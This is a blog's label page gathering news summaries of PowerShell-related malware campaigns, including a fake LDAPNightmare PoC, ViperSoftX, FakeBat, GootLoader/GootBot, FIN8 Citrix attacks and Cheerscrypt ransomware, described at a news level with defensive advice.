Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label PowerShell. Show all posts
Trend Micro SafeBreach Vulnerability Attack Security
Cybersecurity Exploit FTP server Infostealer malware PowerShell Trend Micro SafeBreach Vulnerability Attack Security

Malicious GitHub PoC Exploit Spreads Infostealer Malware

 

A malicious GitHub repository disguises a proof-of-concept (PoC) exploit for CVE-2024-49113, also known as "LDAPNightmare," delivering infostealer malware that sends sensitive data to an external FTP server. Disguised as a legitimate PoC, the exploit tricks users into executing malware.

While using fake PoC exploits is not a new tactic, Trend Micro's discovery shows that cybercriminals continue to deceive unsuspecting users. This malicious repository appears to be a fork of SafeBreach Labs' original PoC for CVE-2024-49113, which was released on January 1, 2025.

CVE-2024-49113 is one of two vulnerabilities affecting the Windows Lightweight Directory Access Protocol (LDAP), which was patched by Microsoft during December 2024's Patch Tuesday. The other vulnerability, CVE-2024-49112, is a critical remote code execution (RCE) flaw.

SafeBreach's blog post initially mislabeled the vulnerability as CVE-2024-49112, which sparked interest in LDAPNightmare, potentially attracting threat actors looking to exploit this buzz.

The PoC from the malicious repository contains a UPX-packed executable, 'poc.exe,' which drops a PowerShell script in the victim's %Temp% folder upon execution. The script sets up a scheduled job that runs an encoded script, which fetches another script from Pastebin.

This final payload gathers information such as computer details, process lists, network data, and installed updates, which it then compresses into a ZIP file and uploads to an external FTP server using hardcoded credentials.

Users downloading PoCs from GitHub should exercise caution, trusting only reputable cybersecurity firms and researchers. Verifying repository authenticity and reviewing code before execution is essential. For added security, consider uploading binaries to VirusTotal and avoid anything that appears obfuscated.
Read more »
Software
ebooks Encryption malware PDF PowerShell Software

Improved ViperSoftX Malware Distributed Through eBooks

 



Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%MicrosoftWindows directory, renaming them to .au3 and AutoIt3.exe.

A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.

Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


Read more »
PowerShell
Cyber Security FakeBat malware loader Malvertising Campaign Malware Attack PowerShell

The Surge of FakeBat Malware in Search-Based Malvertising Campaigns

 

In recent months, cybersecurity researchers have observed a concerning surge in search-based malvertising campaigns, with documented incidents nearly doubling compared to previous periods. Amidst this uptick in online threats, one particular malware variant has captured the attention of experts: FakeBat. 

This malware employs unique techniques in its distribution, posing significant challenges to cybersecurity efforts worldwide. FakeBat has emerged as a significant player in malvertising campaigns, leveraging sophisticated tactics to deceive unsuspecting victims. Unlike conventional malware strains, FakeBat stands out for its utilization of MSIX installers bundled with heavily obfuscated PowerShell code. 

This innovative approach allows threat actors to orchestrate complex attacks while evading traditional detection methods. However, recent iterations of the malware have demonstrated a shift towards more advanced redirection tactics. Threat actors now leverage a variety of redirectors, including legitimate websites, to evade security measures and increase the effectiveness of their attacks. Traditionally, malvertising campaigns targeted specific software brands. 

However, the latest wave of FakeBat attacks has exhibited a notable shift towards diversification in campaign targets. Threat actors now aim to compromise a wide range of brands, expanding their scope and posing a greater threat to businesses and individuals alike. In addition to traditional URL shorteners, FakeBat malvertising campaigns now employ dual redirection tactics. 

While continuing to abuse URL/analytics shorteners, threat actors also leverage subdomains from compromised legitimate websites. By exploiting the credibility associated with these compromised domains, threat actors can circumvent detection mechanisms and increase the success rate of their attacks. Current FakeBat campaigns frequently impersonate reputable brands such as OneNote, Epic Games, Ginger, and the Braavos smart wallet application. 

These malicious domains are often hosted on Russian-based infrastructure, further complicating detection and mitigation efforts for cybersecurity professionals. Despite ongoing efforts to detect and mitigate FakeBat attacks, threat actors continue to evolve their tactics and payloads. Upon execution, a standardized PowerShell script connects to the attacker's command and control server, allowing threat actors to catalog victims for future exploitation. 

Defending against FakeBat and other search-based malvertising threats requires a multifaceted approach. While blocking malicious payloads is crucial, addressing supporting infrastructure poses significant challenges. Implementing robust ad-blocking policies, such as ThreatDown DNS Filter, can effectively thwart malvertising attacks at their source. 

However, organizations must remain vigilant and adapt their defense strategies to counter evolving threats continually. As search-based malvertising continues to evolve, businesses and individuals must remain proactive in their cybersecurity efforts. Understanding the nuances of emerging malware variants like FakeBat and adapting defense strategies accordingly is paramount to safeguarding digital assets against evolving threats. By leveraging tested mitigation measures and collaborating with industry partners, organizations can effectively mitigate the risks posed by search-based malvertising and protect against future cyberattacks.
Read more »
PowerShell
Cobalt Strike GootLoader JavaScript exploit malware PowerShell

Novel GootLoader Malware Strain Bypasses Detection and Spreads Quickly

 

GootBot, a new variant of the GootLoader malware, has been detected to enable lateral movement on compromised systems and avoid detection.

Golo Mühr and Ole Villadsen of IBM X-Force said that the GootLoader group introduced their own custom bot into the final stages of their attack chain in an effort to evade detection while employing commercial C2 tools like CobaltStrike or RDP.

"This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads," the researchers explained. 

As its name suggests, GootLoader is a malware that can lure in potential victims by employing search engine optimisation (SEO) poisoning techniques, and once inside, it can download more sophisticated malware. It is linked to a threat actor known as UNC2565, also tracked as Hive0127. 

The use of GootBot suggests a change in strategy from post-exploitation frameworks like CobaltStrike, with the implant being downloaded as a payload following a Gootloader infection.

GootBot, which is described as an obfuscated PowerShell script, is designed to connect to a WordPress website that has been compromised in order to take control of it and issue commands. The use of an alternate hard-coded C2 server for every deposited GootBot sample complicates matters even more and makes it challenging to block malicious traffic. 

"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers added.

An obfuscated JavaScript file included in the archive file is executed by a scheduled task to retrieve another JavaScript file for persistence. 

The second stage involves the engineering of JavaScript to execute a PowerShell script that collects system information and exfiltrates it to a remote server. The server then responds with another PowerShell script that runs indefinitely and gives the threat actor the ability to disperse different payloads. 

Among them is GootBot, which sends out beacons to its C2 server once every 60 seconds to retrieve PowerShell tasks to be executed and sends back HTTP POST requests to the server with the results of the execution. GootBot's other skills include reconnaissance and lateral movement, which let it effectively increase the attack's range.
Read more »
Vulnerabilities and Exploits
Patch Management Payload Injection PowerShell Ransomware attack Vulnerabilities and Exploits

Ransomware Actor Linked to Attacks Against Citrix NetScaler System

 

Unpatched Citrix NetScaler systems are compromised in domain-wide attacks by a threat actor believed to be linked with the FIN8 hacker organisation exploiting the CVE-2023-3519 remote code execution vulnerability. 

Sophos has been keeping an eye on this campaign since the middle of August, and it has learned that the threat actor executes payload injections, using BlueVPS for malware distribution, delivers obfuscated PowerShell scripts, and drops PHP webshells on victim machines. 

The similarities to another operation spotted earlier this summer by Sophos experts have led the analysts to conclude that the two actions are linked, with the threat actor specialising in ransomware attacks. 

CVE-2023-3519 is a critical-severity (CVSS score: 9.8) code injection vulnerability in Citrix NetScaler ADC and NetScaler Gateway that was identified in mid-July 2023 as an actively exploited zero-day. 

The vendor issued security upgrades to address the issue on July 18th. However, there was evidence that fraudsters were allegedly selling an exploit for the bug since at least July 6th, 2023. 

Shadowserver reported finding 640 webshells in an equivalent number of infected Citrix servers on August 2nd, and Fox-IT increased that total to 1,952 two weeks later. 

More than a month after the security upgrade became available in mid-August, approximately 31,000 Citrix NetScaler instances still had CVE-2023-3519 vulnerabilities, offering threat actors plenty of room for attacks. 

A threat actor identified by Sophos X-Ops as "STAC4663" is reportedly exploiting CVE-2023-3519, and the researchers believe that this is a part of the same campaign that Fox-IT previously reported on earlier this month. 

Analysis of the recent attacks' payload, which is injected into "wuauclt.exe" or "wmiprvse.exe," is still ongoing. However, Sophos believes that it is a link in a chain of ransomware attacks based on the attacker's profile. 

According to Sophos, the campaign is possibly linked to the FIN8 hacker gang, which was recently identified as delivering the BlackCat/ALPHV ransomware. This assumption and the link to the previous campaign of the ransomware actor are based on domain discovery, plink, BlueVPS hosting, unique PowerShell scripting, and the PuTTY Secure Copy [pscp]. 

Finally, the attackers employ a C2 IP address (45.66.248[.]189) for malware staging, as well as a second C2 IP address (85.239.53[.]49) that responds to the same C2 software as in the prior campaign. To assist defenders in detecting and stopping the attack, Sophos has published a list of IoCs (indicators of compromise) for this campaign on GitHub.
Read more »
zero-day
Anonymous Data Breach ICAN Italy Kali Linux PowerShell servers Software Trojan unauthorised access zero-day

Global Ransomware Attack Targets VMware ESXi Servers



Cybersecurity firms around the world have recently warned of an increase in cyberattacks, particularly those targeting corporate banking clients and computer servers. The Italian National Cybersecurity Agency (ACN) recently reported a global ransomware hacking campaign that targeted VMware ESXi servers, urging organisations to take action to protect their systems.

In addition, Italian cybersecurity firm Cleafy researchers Federico Valentini and Alessandro Strino reported an ongoing financial fraud campaign since at least 2019 that leverages a new web-inject toolkit called drIBAN. The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments, altering legitimate banking transfers performed by the victims and transferring money to an illegitimate bank account.

These accounts are either controlled by the threat actors or their affiliates, who are then tasked with laundering the stolen funds. The fraudulent transactions are often realized by means of a technique called Automated Transfer System (ATS) that's capable of bypassing anti-fraud systems put in place by banks and initiating unauthorized wire transfers from a victim's own computer.

The operators behind drIBAN have become more adept at avoiding detection and developing effective social engineering strategies, in addition to establishing a foothold for long periods in corporate bank networks. Furthermore, there are indications that the activity cluster overlaps with a 2018 campaign mounted by an actor tracked by Proofpoint as TA554 targeting users in Canada, Italy, and the U.K.

Organisations need to be aware of these threats and take immediate action to protect their systems from cyberattacks. The ACN has reported that dozens of Italian organisations have been likely affected by the global ransomware attack and many more have been warned to take action to avoid being locked out of their systems.


Read more »
TTPs
Data Breach Malicious actor Mandiant Threat Intelligence PowerShell Ransomware Attacks. TTPs

Evolution of Gootkit Malware Using Obfuscations

Mandiant Managed Defense has reliably resolved GOOTLOADER infections since January 2021. When spreading GOOTLOADER, malicious actors cast a wide net, affecting a variety of industrial verticals and geographical areas.

Gootkit Malware

The Gootkit Trojan is Javascript-based malware that carries out a number of malicious tasks, such as authorizing threat actors remote access, recording video, capturing keystrokes, stealing emails, stealing passwords, and having the ability to inject malicious files to steal online banking login details.

Gootkit previously spread malware in the disguise of freeware installers, but now it deceives users into downloading these files by presenting them as legal documents. A user enters a search query into a search engine to begin the attack chain. 

Mandiant Managed Defense believes that UNC2565, a group it tracks, is the sole group that the GOOTLOADER virus and infrastructure belong to at this time. Due to these breaches' rapid detection and mitigation, Mandiant's observation of post-compromise GOOTLOADER activities has mostly been restricted to internal surveillance.

If the GOOTLOADER file is successfully executed, other payloads like FONELAUNCH and Cobalt Strike BEACON or SNOWCONE that are saved in the registry will be downloaded. Future phases include PowerShell being used to execute these payloads.

The. NET-based loader FONELAUNCH is intended to load an encoded payload into memory, while the downloader SNOWCONE is responsible for obtaining next-stage payloads, notably IcedID, through HTTP.

The primary aims of Gootkit have remained the same, however, the attack process has undergone substantial modifications. Currently, the JavaScript file contained in the ZIP archive is trojanized and contains a different JavaScript file that is obfuscated and then begins to execute the malware.

Furthermore, to avoid detection, the malware's creators allegedly used three distinct strategies to cloak Gootkit, including hiding the code inside modified versions of trustworthy JavaScript libraries like jQuery, Chroma.js, and Underscore.js. These modifications show how actively developing and expanding UNC2565's capabilities remain.


Read more »
RaaS
APT actors Chinese Hackers Command and Control(C2) Data Breach Encryption Log4Shell PowerShell RaaS

Cheerscrypt Spyware Attributed to Chinese APT Entity

The Emperor Dragonfly Chinese hacker group, notorious for frequently switching between several ransomware families to avoid detection, has been connected to the Cheerscrypt virus. 

The attacks were linked by the cybersecurity company Sygnia to a threat actor also dubbed Bronze Starlight and DEV-0401. The hacking gang seems to be a ransomware operation, but past research suggests that the Chinese government is interested in many of its victims.

Cheerscrypt is the most recent addition to a long range of ransomware families that the gang has previously used, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0 in a little over a year.

Recently, Sygnia researched a Cheerscrypt ransomware operation that utilized Night Sky ransomware TTPs. The attackers then dropped a Cobalt Strike beacon linked to a C2 address formerly tied to Night Sky operations. 

The code for the Babuk ransomware, which was exposed online in June 2021, was used to develop the Cheerscrypt ransomware family, which Trend Micro first analyzed in May 2022. Cheerscrypt is one of several ransomware families used by the APT organization. The DEV-0401 group, unlike other ransomware gangs, oversees every stage of the assault chain directly, from the first access to the data theft. It does not rely on a system of affiliates.

A significant Log4Shell vulnerability in Apache Log4j was utilized by hackers in January 2022 assaults to acquire initial access to VMware Horizon servers. They subsequently dropped a PowerShell payload that was used to send an encrypted Cobalt Strike beacon. Apart from the beacon, the hackers also sent three Go-based tools: a keylogger that sent keystrokes to Alibaba Cloud, a customized version of the internet proxy tool iox, and the tunneling program NPS.

Trend Micro initially identified Cheerscrypt in May 2022, highlighting its capacity to target VMware ESXi servers as a component of a tried-and-true strategy known as double extortion to force its victims into paying the ransom or risk having their data exposed.

The hackers break into networks, take information, and encrypt devices just like other ransomware groups that target businesses. The victim is then coerced into paying a ransom through double-extortion methods using the data. The stolen data is posted on a data leak website when a ransom is not paid.

A PowerShell payload that can deliver an encrypted Cobalt Strike beacon has been dropped on VMware Horizon servers by infection chains that have exploited the major Log4Shell vulnerability in the Apache Log4j library.

Cheerscrypt and Emperor Dragonfly share initial access vectors, and lateral movement strategies, including the use of DLL side-loading to distribute the encrypted Cobalt Strike beacon. Notably, the ransomware gang is acting as a 'lone wolf' separated from the rest of the cybercrime community rather than as a RaaS (Ransomware-as-a-Service) platform for affiliates.






Read more »
Subscribe to: Posts (Atom)